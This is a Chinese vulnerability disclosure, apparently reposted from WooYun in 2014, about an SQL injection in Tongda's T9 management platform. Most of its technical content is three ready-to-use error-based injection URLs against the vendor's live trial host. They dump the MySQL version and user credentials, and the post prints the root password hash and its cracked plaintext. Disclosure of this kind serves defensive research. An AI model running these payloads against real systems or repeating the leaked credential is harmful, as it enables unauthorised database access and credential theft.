[公开漏洞]T9智能管理平台标准版SQL注入漏洞

来源：WooYun　浏览：933次　时间：2014-05-02

T9智能管理平台标准版SQL注入漏洞相关厂商：通达信科漏洞作者：jinglingshu 提交时间：2014-03-18 11:44 公开时间：2014-05-02 11:44 漏洞类型：SQL注射漏洞危害等级：高自评Rank：15 漏洞状态：厂商已经确认漏洞来源：http://www.wooyun.org Tags标签：字符类型注射 mysql报错注入漏洞详情披露状态：

2014-03-18：细节已通知厂商并且等待厂商处理中
2014-03-26：厂商已经确认，细节仅向厂商公开
2014-04-05：细节向核心白帽子及相关领域专家公开
2014-04-15：细节向普通白帽子公开
2014-04-25：细节向实习白帽子公开
2014-05-02：细节向公众公开

简要描述：

通达T9智能管理平台标准版存在SQL注入漏洞。

详细说明：

通达T9智能管理平台标准版的在线试用地址是http://t9.go2oa.com:86/t9/login.jsp，登陆后，core/funcs/news/show/reNews.jsp页面存在mysql报错注入漏洞，可以获取系统数据信息。

1、http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select @@version from flow_sort limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1

2、爆root用户密码

http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 0,1))a from flow_sort group by a)b where 1=1 or '1'='1

成功爆出root的口令91AF99F23C3D4ED85140D100433725DFA52BECEE，破解后为：myoa888。

3、爆mysql可远程连接的用户密码

http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1